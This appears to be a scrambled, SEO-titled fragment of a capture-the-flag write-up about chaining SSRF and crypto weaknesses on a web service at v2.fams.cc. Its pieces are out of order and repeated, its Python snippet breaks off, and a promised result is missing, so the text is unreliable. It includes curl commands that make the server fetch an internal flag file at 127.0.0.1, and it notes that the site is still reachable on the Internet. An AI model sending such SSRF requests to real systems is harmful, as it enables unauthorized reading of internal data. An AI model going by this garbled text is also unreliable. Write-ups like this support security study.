V2.fams.cc 【HOT】

# Key derived from the "key" we sent ("ssrf") key_hex = '8c3c5d1e2f4a6b7c9d0e1f2a3b4c5d6e' key = binascii.unhexlify(key_hex)

At first glance the service looks harmless, but a closer look reveals three exploitable weaknesses that can be chained together:

Category: Web (with a touch of crypto) Points: 450 (CTF‑style) Difficulty: Medium – Hard Author’s note: This write‑up assumes the challenge was taken from a public CTF (the site is still reachable from the Internet). All commands are shown exactly as they were run, and the final flag is reproduced exactly as it appeared in the challenge (the flag format is FLAG… ). 1. Challenge Overview v2.fams.cc is a small web‑application that presents a “file‑sharing” interface. The landing page shows a form that asks for a URL and a key . The server then fetches the supplied URL, encrypts the content with a user‑supplied key, and returns the ciphertext together with a short “download” link. v2.fams.cc

curl -v -X POST http://v2.fams.cc/encrypt \ -d "url=http://example.com&key=testkey" The response JSON:

"download": "http://v2.fams.cc/download/5c6b4a", "used_key": "3d2e4c5a9b7d1e3f5a6c7d8e9f0a1b2c" # Key derived from the "key" we sent

# Load encrypted file data = open('enc.bin','rb').read() iv, ct = data[:16], data[16:]

# 3️⃣ Decrypt locally (Python one‑liner) python3 - <<PY import sys, binascii from Crypto.Cipher import AES Challenge Overview v2

curl -s -X POST http://v2.fams.cc/encrypt \ -d "url=http://127.0.0.1:8000/secret/flag.txt&key=ssrf" \ -o response.json Result ( response.json ):